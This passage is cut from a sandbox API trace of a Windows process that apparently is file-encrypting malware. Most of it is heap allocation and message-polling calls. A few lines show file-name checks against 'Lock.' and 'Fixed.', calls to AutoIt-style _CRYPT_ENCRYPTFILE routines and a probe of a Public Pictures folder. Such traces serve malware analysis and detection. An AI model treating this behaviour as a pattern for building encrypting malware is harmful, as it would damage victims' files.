Size=0x10) returned 0x2e51a90 [0269.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0269.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0269.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0269.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0269.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0269.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0269.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0269.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15a18 | out: hHeap=0x970000) returned 1 [0269.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0269.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0269.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0269.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0269.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0269.126] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0269.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0269.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0269.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0269.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0269.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0269.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0269.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0269.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0269.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0269.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0269.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0269.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0269.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0269.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0269.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0269.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0269.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0269.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0269.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0269.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0269.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0269.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0269.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0269.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0269.127] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0269.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0269.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0269.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0269.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0269.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0269.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0269.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0269.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0269.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0269.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0269.140] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0269.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0269.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0269.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0269.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0269.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0269.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0269.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0269.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0269.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0269.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0269.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0269.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0269.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0269.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0269.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0269.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0269.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0269.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0269.141] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0269.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0269.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0269.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0269.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0269.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0269.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0269.141] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.141] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0269.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0269.142] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.142] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.142] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.142] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.142] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures/desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xe07e8, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa875d0 [0269.142] FindClose (in: hFindFile=0xa875d0 | out: hFindFile=0xa875d0) returned 1 [0269.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0269.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0269.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0269.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0269.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0269.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0269.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0269.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0269.143] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.143] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.143] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0269.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0269.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0269.143] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.143] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0269.143] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0269.144] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.144] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.144] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.144] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0269.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0269.144] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.144] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0269.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0269.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0269.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0269.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0269.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0269.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0269.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0269.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0269.144] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.145] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, 